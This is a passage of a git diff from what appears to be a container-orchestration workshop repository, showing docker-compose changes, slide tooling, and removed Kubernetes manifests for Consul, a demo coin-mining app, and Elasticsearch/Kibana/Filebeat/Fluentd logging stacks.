image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
12
consul/docker-compose.yml
Normal file
@@ -0,0 +1,12 @@
|
||||
version: "2"
|
||||
services:
|
||||
bootstrap:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -bootstrap
|
||||
container_name: bootstrap
|
||||
server:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -join bootstrap -join server
|
||||
client:
|
||||
image: jpetazzo/consul
|
||||
command: members -rpc-addr server:8400
|
||||
@@ -1,5 +1,5 @@
|
||||
FROM ruby:alpine
|
||||
RUN apk add --update build-base curl
|
||||
RUN apk add --update build-base
|
||||
RUN gem install sinatra
|
||||
RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
|
||||
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0", port=80, threaded=False)
|
||||
app.run(host="0.0.0.0", port=80)
|
||||
|
||||
|
||||
@@ -50,7 +50,7 @@ function refresh () {
|
||||
points.push({ x: s2.now, y: speed });
|
||||
}
|
||||
$("#speed").text("~" + speed.toFixed(1) + " hashes/second");
|
||||
var msg = ("I'm attending a @docker orchestration workshop, "
|
||||
var msg = ("I'm attending the @docker workshop at #LinuxCon, "
|
||||
+ "and my #DockerCoins mining rig is crunching "
|
||||
+ speed.toFixed(1) + " hashes/second! W00T!");
|
||||
$("#tweet").attr(
|
||||
|
||||
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
9
docs/chat/index.html
Normal file
@@ -0,0 +1,9 @@
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='https://gitter.im/jpetazzo/workshop-20170508-austin'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="https://gitter.im/jpetazzo/workshop-20170508-austin">https://gitter.im/jpetazzo/workshop-20170508-austin</a>
|
||||
</body>
|
||||
</html>
|
||||
16
docs/chat/index.html.sh
Executable file
@@ -0,0 +1,16 @@
|
||||
#!/bin/sh
|
||||
LINK=https://gitter.im/jpetazzo/workshop-20170508-austin
|
||||
#LINK=https://dockercommunity.slack.com/messages/docker-mentor
|
||||
#LINK=https://usenix-lisa.slack.com/messages/docker
|
||||
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='$LINK'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="$LINK">$LINK</a>
|
||||
</body>
|
||||
</html>
|
||||
EOF
|
||||
|
||||
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
|
Before Width: | Height: | Size: 26 KiB After Width: | Height: | Size: 26 KiB |
|
Before Width: | Height: | Size: 680 KiB After Width: | Height: | Size: 680 KiB |
|
Before Width: | Height: | Size: 137 KiB After Width: | Height: | Size: 137 KiB |
|
Before Width: | Height: | Size: 252 KiB After Width: | Height: | Size: 252 KiB |
|
Before Width: | Height: | Size: 213 KiB After Width: | Height: | Size: 213 KiB |
|
Before Width: | Height: | Size: 901 KiB After Width: | Height: | Size: 901 KiB |
|
Before Width: | Height: | Size: 575 KiB After Width: | Height: | Size: 575 KiB |
|
Before Width: | Height: | Size: 205 KiB After Width: | Height: | Size: 205 KiB |
19
docs/extract-section-titles.py
Executable file
@@ -0,0 +1,19 @@
|
||||
#!/usr/bin/env python
|
||||
"""
|
||||
Extract and print level 1 and 2 titles from workshop slides.
|
||||
"""
|
||||
|
||||
separators = [
|
||||
"---",
|
||||
"--"
|
||||
]
|
||||
|
||||
slide_count = 1
|
||||
for line in open("index.html"):
|
||||
line = line.strip()
|
||||
if line in separators:
|
||||
slide_count += 1
|
||||
if line.startswith('# '):
|
||||
print slide_count, '# #', line
|
||||
elif line.startswith('# '):
|
||||
print slide_count, line
|
||||
|
Before Width: | Height: | Size: 147 KiB After Width: | Height: | Size: 147 KiB |
|
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 145 KiB |
6473
docs/index.html
Normal file
|
Before Width: | Height: | Size: 24 KiB After Width: | Height: | Size: 24 KiB |
|
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 145 KiB |
|
Before Width: | Height: | Size: 41 KiB After Width: | Height: | Size: 41 KiB |
|
Before Width: | Height: | Size: 42 KiB After Width: | Height: | Size: 42 KiB |
|
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 18 KiB |
|
Before Width: | Height: | Size: 59 KiB After Width: | Height: | Size: 59 KiB |
|
Before Width: | Height: | Size: 48 KiB After Width: | Height: | Size: 48 KiB |
|
Before Width: | Height: | Size: 266 KiB After Width: | Height: | Size: 266 KiB |
|
Before Width: | Height: | Size: 1.2 MiB After Width: | Height: | Size: 1.2 MiB |
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
|
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 53 KiB |
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch:2
|
||||
image: elasticsearch
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash:2
|
||||
image: logstash
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana:4
|
||||
image: kibana
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
@@ -1,21 +0,0 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
annotations:
|
||||
traefik.ingress.kubernetes.io/service-weights: |
|
||||
whatever: 90%
|
||||
whatever-new: 10%
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 80
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever-new
|
||||
servicePort: 80
|
||||
@@ -1,15 +0,0 @@
|
||||
apiVersion: apiextensions.k8s.io/v1beta1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
version: v1alpha1
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
@@ -1,35 +0,0 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
properties:
|
||||
spec:
|
||||
required:
|
||||
- taste
|
||||
properties:
|
||||
taste:
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
type: string
|
||||
additionalPrinterColumns:
|
||||
- jsonPath: .spec.taste
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
name: Taste
|
||||
type: string
|
||||
- jsonPath: .metadata.creationTimestamp
|
||||
name: Age
|
||||
type: date
|
||||
@@ -1,29 +0,0 @@
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: arabica
|
||||
spec:
|
||||
taste: strong
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: robusta
|
||||
spec:
|
||||
taste: stronger
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: liberica
|
||||
spec:
|
||||
taste: smoky
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: excelsa
|
||||
spec:
|
||||
taste: fruity
|
||||
|
||||
@@ -1,86 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
@@ -1,28 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: build-image
|
||||
spec:
|
||||
restartPolicy: OnFailure
|
||||
containers:
|
||||
- name: docker-build
|
||||
image: docker
|
||||
env:
|
||||
- name: REGISTRY_PORT
|
||||
value: #"30000"
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
mkdir /workspace &&
|
||||
git clone https://github.com/jpetazzo/container.training /workspace &&
|
||||
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
|
||||
docker push localhost:$REGISTRY_PORT/worker
|
||||
volumeMounts:
|
||||
- name: docker-socket
|
||||
mountPath: /var/run/docker.sock
|
||||
volumes:
|
||||
- name: docker-socket
|
||||
hostPath:
|
||||
path: /var/run/docker.sock
|
||||
|
||||
@@ -1,160 +0,0 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
@@ -1,69 +0,0 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: cerebro
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
spec:
|
||||
volumes:
|
||||
- name: conf
|
||||
configMap:
|
||||
name: cerebro
|
||||
containers:
|
||||
- image: lmenezes/cerebro
|
||||
name: cerebro
|
||||
volumeMounts:
|
||||
- name: conf
|
||||
mountPath: /conf
|
||||
args:
|
||||
- -Dconfig.file=/conf/application.conf
|
||||
env:
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
ports:
|
||||
- port: 9000
|
||||
protocol: TCP
|
||||
targetPort: 9000
|
||||
selector:
|
||||
app: cerebro
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: cerebro
|
||||
data:
|
||||
application.conf: |
|
||||
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
|
||||
|
||||
hosts = [
|
||||
{
|
||||
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
|
||||
name = "demo"
|
||||
auth = {
|
||||
username = "elastic"
|
||||
password = ${?ELASTICSEARCH_PASSWORD}
|
||||
}
|
||||
}
|
||||
]
|
||||
@@ -1,19 +0,0 @@
|
||||
apiVersion: elasticsearch.k8s.elastic.co/v1
|
||||
kind: Elasticsearch
|
||||
metadata:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
spec:
|
||||
http:
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
nodeSets:
|
||||
- name: default
|
||||
count: 1
|
||||
config:
|
||||
node.data: true
|
||||
node.ingest: true
|
||||
node.master: true
|
||||
node.store.allow_mmap: false
|
||||
version: 7.5.1
|
||||
@@ -1,168 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.inputs:
|
||||
- type: container
|
||||
paths:
|
||||
- /var/log/containers/*.log
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
host: ${NODE_NAME}
|
||||
matchers:
|
||||
- logs_path:
|
||||
logs_path: "/var/log/containers/"
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# node: ${NODE_NAME}
|
||||
# hints.enabled: true
|
||||
# hints.default_config:
|
||||
# type: container
|
||||
# paths:
|
||||
# - /var/log/containers/*${data.kubernetes.container.id}.log
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
- add_host_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
hostNetwork: true
|
||||
dnsPolicy: ClusterFirstWithHostNet
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat:7.5.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: demo-es-http
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,17 +0,0 @@
|
||||
apiVersion: kibana.k8s.elastic.co/v1
|
||||
kind: Kibana
|
||||
metadata:
|
||||
name: demo
|
||||
spec:
|
||||
version: 7.5.1
|
||||
count: 1
|
||||
elasticsearchRef:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
http:
|
||||
service:
|
||||
spec:
|
||||
type: NodePort
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
176
k8s/efk.yaml
@@ -1,176 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: fluentd
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- namespaces
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: fluentd
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: fluentd
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: fluentd
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
- name: FLUENT_ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 200Mi
|
||||
volumeMounts:
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
terminationGracePeriodSeconds: 30
|
||||
volumes:
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
app: kibana
|
||||
type: NodePort
|
||||
@@ -1,21 +0,0 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
@@ -1,94 +0,0 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
